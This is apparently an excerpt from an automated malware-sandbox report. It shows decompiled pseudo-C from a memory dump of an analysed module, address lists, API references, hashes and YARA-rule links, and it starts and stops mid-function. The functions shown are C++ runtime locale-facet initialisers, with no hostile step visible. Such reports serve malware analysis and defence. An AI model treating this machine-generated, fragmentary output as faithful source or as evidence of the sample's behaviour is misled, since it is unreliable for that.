							 *(_t418 - 4) = 1;
							E6D478A0B(__eflags, _t389);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6d53fdd8 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

0x6d480be8
0x6d480be8
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c19
0x6d480c1e
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26

APIs

__EH_prolog3.LIBCMT ref: 6D480BEF
std::_Lockit::_Lockit.LIBCPMT ref: 6D480BF9

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480C33
std::_Facet_Register.LIBCPMT ref: 6D480C4A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480C6A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480C88

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 89267f0f5616d0687cd3734de11f6f4edc7ff38ffbef9892f284086a0c13418f
Instruction ID: 1f4bdf154e9b70b017e5b69de2733d84f86e373b8fcc8f200a90fed21d123b15
Opcode Fuzzy Hash: 89267f0f5616d0687cd3734de11f6f4edc7ff38ffbef9892f284086a0c13418f
Instruction Fuzzy Hash: AC119A72904229CBCF19DFA5C884EEE7775AF85364F26080DE610AB2A0DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CB92, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D48CB92(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t334 = __fp0;
				_t305 = __edx;
				_t234 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t330 - 0x14, 0);
				_t315 =  *0x6d53fe38; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6D451D10();
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6D476A77(_t330 - 0x14);
					return E6D490E67(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6D48D27D(__ebx, _t237, __edx, _t307, _t315, __eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t330 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t307, _t315);
							E6D476A10(_t330 - 0x14, 0);
							_t316 =  *0x6d53fe3c; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6D451D10();
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6D476A77(_t330 - 0x14);
								return E6D490E67(_t308);
							} else {
								__eflags = _t316;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6D48D2E5(_t234, _t244, __edx, _t308, _t316, __eflags, __fp0) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t330 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t234, _t308, _t316);
										E6D476A10(_t330 - 0x14, 0);
										_t317 =  *0x6d53fe40; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6D451D10();
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6D476A77(_t330 - 0x14);
											return E6D490E67(_t309);
										} else {
											__eflags = _t317;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6D48D34D(_t234, _t251, __edx, _t309, _t317, __eflags, __fp0) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t330 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t234, _t309, _t317);
													E6D476A10(_t330 - 0x14, 0);
													_t318 =  *0x6d53fe48; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6D451D10();
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6D476A77(_t330 - 0x14);
														return E6D490E67(_t310);
													} else {
														__eflags = _t318;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6D48D3B5(_t234, _t258, _t305, _t310, _t318, __eflags, _t334) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t234, _t310, _t318);
																E6D476A10(_t330 - 0x14, 0);
																_t319 =  *0x6d53fe44; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6D451D10();
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6D476A77(_t330 - 0x14);
																	return E6D490E67(_t311);
																} else {
																	__eflags = _t319;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6D48D439(_t234, _t265, _t305, _t311, _t319, __eflags, _t334) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t234, _t311, _t319);
																			E6D476A10(_t330 - 0x14, 0);
																			_t320 =  *0x6d53fe4c; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6D451D10();
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6D476A77(_t330 - 0x14);
																				return E6D490E67(_t312);
																			} else {
																				__eflags = _t320;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6D48D4BE(_t234, _t272, _t305, _t312, _t320, __eflags, _t334) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t234, _t312, _t320);
																						E6D476A10(_t330 - 0x14, 0);
																						_t321 =  *0x6d53fe50; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6D451D10();
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6D476A77(_t330 - 0x14);
																							return E6D490E67(_t313);
																						} else {
																							__eflags = _t321;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6D48D52A(_t234, _t279, _t305, _t313, _t321, __eflags, _t334) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(4);
																									E6D490E9E(0x6d4fefbc, _t234, _t313, _t321);
																									_t322 = _t330 - 0x20;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_push( *((intOrPtr*)(_t330 + 8)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6d5044f4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6D48E2BD(_t234, _t330 - 0x20, _t305, _t313, _t322,  *_t105, _t334);
																									return E6D490E67(_t322);
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6D478A0B(__eflags, _t313);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6d53fe50 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6D478A0B(__eflags, _t312);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6d53fe4c = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6D478A0B(__eflags, _t311);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6d53fe44 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6D478A0B(__eflags, _t310);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6d53fe48 = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6D478A0B(__eflags, _t309);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6d53fe40 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6D478A0B(__eflags, _t308);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6d53fe3c = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6D478A0B(__eflags, _t307);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6d53fe38 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6d48cb92
0x6d48cb92
0x6d48cb92
0x6d48cb92
0x6d48cb99
0x6d48cba3
0x6d48cba8
0x6d48cbb3
0x6d48cbb7
0x6d48cbba
0x6d48cbbf
0x6d48cbc3
0x6d48cbc8
0x6d48cbcc
0x6d48cc11
0x6d48cc14
0x6d48cc20
0x6d48cbce
0x6d48cbd0
0x6d48cbd6
0x6d48cbdc
0x6d48cbe4
0x6d48cbe7
0x6d48cc24
0x6d48cc32
0x6d48cc37
0x6d48cc38
0x6d48cc3f
0x6d48cc49
0x6d48cc4e
0x6d48cc59
0x6d48cc5d
0x6d48cc60
0x6d48cc65
0x6d48cc6e
0x6d48cc70
0x6d48cc72
0x6d48ccb7
0x6d48ccba
0x6d48ccc6
0x6d48cc74
0x6d48cc74
0x6d48cc76
0x6d48cc7c
0x6d48cc82
0x6d48cc8a
0x6d48cc8d
0x6d48ccca
0x6d48ccd8
0x6d48ccdd
0x6d48ccde
0x6d48cce5
0x6d48ccef
0x6d48ccf4
0x6d48ccff
0x6d48cd03
0x6d48cd06
0x6d48cd0b
0x6d48cd14
0x6d48cd16
0x6d48cd18
0x6d48cd5d
0x6d48cd60
0x6d48cd6c
0x6d48cd1a
0x6d48cd1a
0x6d48cd1c
0x6d48cd22
0x6d48cd28
0x6d48cd30
0x6d48cd33
0x6d48cd70
0x6d48cd7e
0x6d48cd83
0x6d48cd84
0x6d48cd8b
0x6d48cd95
0x6d48cd9a
0x6d48cda5
0x6d48cda9
0x6d48cdac
0x6d48cdb1
0x6d48cdba
0x6d48cdbc
0x6d48cdbe
0x6d48ce03
0x6d48ce06
0x6d48ce12
0x6d48cdc0
0x6d48cdc0
0x6d48cdc2
0x6d48cdc8
0x6d48cdce
0x6d48cdd6
0x6d48cdd9
0x6d48ce16
0x6d48ce24
0x6d48ce29
0x6d48ce2a
0x6d48ce31
0x6d48ce3b
0x6d48ce40
0x6d48ce4b
0x6d48ce4f
0x6d48ce52
0x6d48ce57
0x6d48ce60
0x6d48ce62
0x6d48ce64
0x6d48cea9
0x6d48ceac
0x6d48ceb8
0x6d48ce66
0x6d48ce66
0x6d48ce68
0x6d48ce6e
0x6d48ce74
0x6d48ce7c
0x6d48ce7f
0x6d48cebc
0x6d48ceca
0x6d48cecf
0x6d48ced0
0x6d48ced7
0x6d48cee1
0x6d48cee6
0x6d48cef1
0x6d48cef5
0x6d48cef8
0x6d48cefd
0x6d48cf06
0x6d48cf08
0x6d48cf0a
0x6d48cf4f
0x6d48cf52
0x6d48cf5e
0x6d48cf0c
0x6d48cf0c
0x6d48cf0e
0x6d48cf14
0x6d48cf1a
0x6d48cf22
0x6d48cf25
0x6d48cf62
0x6d48cf70
0x6d48cf75
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfac
0x6d48cfae
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4
0x6d48cf27
0x6d48cf27
0x6d48cf2a
0x6d48cf2e
0x6d48cf32
0x6d48cf3f
0x6d48cf47
0x6d48cf49
0x00000000
0x6d48cf49
0x6d48cf10
0x6d48cf10
0x00000000
0x6d48cf10
0x6d48cf0e
0x6d48ce81
0x6d48ce81
0x6d48ce84
0x6d48ce88
0x6d48ce8c
0x6d48ce99
0x6d48cea1
0x6d48cea3
0x00000000
0x6d48cea3
0x6d48ce6a
0x6d48ce6a
0x00000000
0x6d48ce6a
0x6d48ce68
0x6d48cddb
0x6d48cddb
0x6d48cdde
0x6d48cde2
0x6d48cde6
0x6d48cdf3
0x6d48cdfb
0x6d48cdfd
0x00000000
0x6d48cdfd
0x6d48cdc4
0x6d48cdc4
0x00000000
0x6d48cdc4
0x6d48cdc2
0x6d48cd35
0x6d48cd35
0x6d48cd38
0x6d48cd3c
0x6d48cd40
0x6d48cd4d
0x6d48cd55
0x6d48cd57
0x00000000
0x6d48cd57
0x6d48cd1e
0x6d48cd1e
0x00000000
0x6d48cd1e
0x6d48cd1c
0x6d48cc8f
0x6d48cc8f
0x6d48cc92
0x6d48cc96
0x6d48cc9a
0x6d48cca7
0x6d48ccaf
0x6d48ccb1
0x00000000
0x6d48ccb1
0x6d48cc78
0x6d48cc78
0x00000000
0x6d48cc78
0x6d48cc76
0x6d48cbe9
0x6d48cbe9
0x6d48cbec
0x6d48cbf0
0x6d48cbf4
0x6d48cc01
0x6d48cc09
0x6d48cc0b
0x00000000
0x6d48cc0b
0x6d48cbd2
0x6d48cbd2
0x00000000
0x6d48cbd2
0x6d48cbd0

APIs

__EH_prolog3.LIBCMT ref: 6D48CB99
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CBA3

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

messages.LIBCPMT ref: 6D48CBDD
std::_Facet_Register.LIBCPMT ref: 6D48CBF4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CC14
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CC32

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: eafc28fa10cf94dd886d0190a4f10a777cf91cf09f4ec5e269d902f463b4f264
Instruction ID: e4f4da627cea5d70f590c2cdc33763716322624db6d232ccd484656c287c18e9
Opcode Fuzzy Hash: eafc28fa10cf94dd886d0190a4f10a777cf91cf09f4ec5e269d902f463b4f264
Instruction Fuzzy Hash: 6D11AC328042298BCF04DFA5C880EEE7775AF85364F26050EE611AB391DF74DE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480A9C, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D480A9C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;
				void* _t510;

				_t469 = __edx;
				_t358 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t506 - 0x14, 0);
				_t483 =  *0x6d53fe08; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6D451D10();
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6D476A77(_t506 - 0x14);
					return E6D490E67(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6D482649(__ebx, _t361, __edx, _t471, _t483, __eflags, _t510) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t506 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t471, _t483);
							E6D476A10(_t506 - 0x14, 0);
							_t484 =  *0x6d53fddc; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6D451D10();
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6D476A77(_t506 - 0x14);
								return E6D490E67(_t472);
							} else {
								__eflags = _t484;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6D4826CE(_t358, _t368, __edx, _t472, _t484, __eflags, _t510) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t506 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t358, _t472, _t484);
										E6D476A10(_t506 - 0x14, 0);
										_t485 =  *0x6d53fdd8; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6D451D10();
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6D476A77(_t506 - 0x14);
											return E6D490E67(_t473);
										} else {
											__eflags = _t485;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6D482752(_t358, _t375, __edx, _t473, _t485, __eflags, _t510) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t506 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t358, _t473, _t485);
													E6D476A10(_t506 - 0x14, 0);
													_t486 =  *0x6d53fdec; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6D451D10();
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t206);
